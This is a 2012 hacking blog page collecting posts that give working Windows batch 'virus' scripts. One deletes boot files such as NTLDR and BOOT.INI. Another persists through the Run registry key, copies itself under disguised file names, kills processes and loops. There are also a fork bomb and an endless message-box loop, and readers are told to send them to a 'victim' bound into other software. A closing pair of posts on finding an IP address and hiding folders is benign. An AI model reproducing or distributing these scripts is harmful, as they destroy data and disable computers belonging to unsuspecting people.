Hacking Gen

Liked us?

Monday 27 February 2012

How To Make A Trojan Virus In Simple Way




Here is the easy way to make a trojan virus it is destructive so dont open it and disable your antivirus.

This one is a Trojan virus. Just copy and paste the code given below in notepad and save it as game.bat(not .txt). Be careful & Don’t run this i.e double click or press enter key on it on your PC.

1) Copy the codes below in notepad 

@ECHO OFF
ATTRIB -R-S-H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R-S-H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R-S-H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R-S-H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

2) Save the file as ''Virus.bat''

Want To Know How To Join This Virus With Any Software Then Visit Here 

Cool Na! Don't Forget To Like,Share And Subscribe.

Sunday 26 February 2012

How To Easily Create Virus To Restart Pc






Well, I know there are lots of techniques available to restart computer. But all the techniques  requires a basic knowledge of  programming. But in this technique you do not need to know whole programming language but you need just little programming  knowledge. You can also create a program to restart window automatically every start up using c or c++ language.You can also programming in other languages and make virus to create a virus to restart program.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.

So first open notepad and paste there following code.

cd..
shutdown /t 30 /r /c "Your computer detects a virus"








Now save as it with .bat extension. and run the file and thats it.


You can see the message that " Your computer detects Virus" and the computer will be shut down in 30 seconds and restart again.
Here,
/t indicates time interval that can be changed.
/r indicates restart windows you can change it to /s to only shutdown windows.
/c indicates the message that you want to display.



 Want To Know How To Join This Virus With Any Software Then Visit Here 


Cool Na! Don't Forget To Like,Share And Subscribe.

How To Make A Virus That Copy Itself Over One Thousand Times


Simple batch virus. (This is quite Destructive ! Use it as i have said.)


This one is a simple batch virus. Just copy and paste the code given below in notepad and save it as game.bat(not .txt). Be careful & Don’t run this i.e double click or press enter key on it on your PC.



1) Copy the below commands into notepad and save it as ''Virus.bat''

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP







What it will Do ?

* Copies itself into startup
* Copy itself over one thousand times into random spots in your computer
* Hide its self and all other created files
* Task kill MSN, Norton, Windows Explorer, Limewire.
* Swap the left mouse button with the right one
* Opens alert boxes
* Changes the time to 12:00 and shuts down the computer

  Want To Know How To Join This Virus With Any Software Then Visit Here 


Cool Na! Don't Forget To Like,Share And Subscribe.


Saturday 25 February 2012

How To Make The Simplest Virus – Overload Bomb






Launching fork bomb will lead to total CPU jam by opening about 500 process or more of command prompt . CPU usage will be overloaded and computer will freeze.


1) Launch notepad and type


%0|%0



2) Save as .bat , for example fork.bat



3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.


Now you just need to do is to send the virus to your victim by binding it with any software

Want To Know How To Join This Virus With Any Software Then Visit Here 

How To Create A Simple Batch File Virus




Here Is A Simple Process On How To Create A Simple Batch File Virus Which Will Keep Pop Upping
Messages And It Cant Be Stopped Only Way To Stop It Is Reboot..

Write the commands in a notepad.
     
Code:


@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * No O.o
msg * Than Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


Save it as "Virus.BAT" and send it to victim or bind it with any software



Want To Know How To Join This Virus With Any Software Then Visit Here 

Easy way to Know your Computer's IP




If you want to know your Compuer,s IP then follow the steps below.;)


1) Open Notepad And Type Codes Below:

 For Windows XP

@echo.
@ipconfig | find "IP Address"
@echo.
@pause

Just Type For Windows 7


@echo.
@ipconfig
@echo.
@pause

2) Then Save File As''IP.bat'' and you are done.




How To Lock Folders With Notepad




You can lock and unlock your folder with this simple trick !
Procedure :1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7.Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8.Lock your folder and hide the key.bat somewhere else on your hard disk !
9.Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !
Share

Widgets

Powered By Blogger
Receive Free Updates Via Email. Subscribe Now!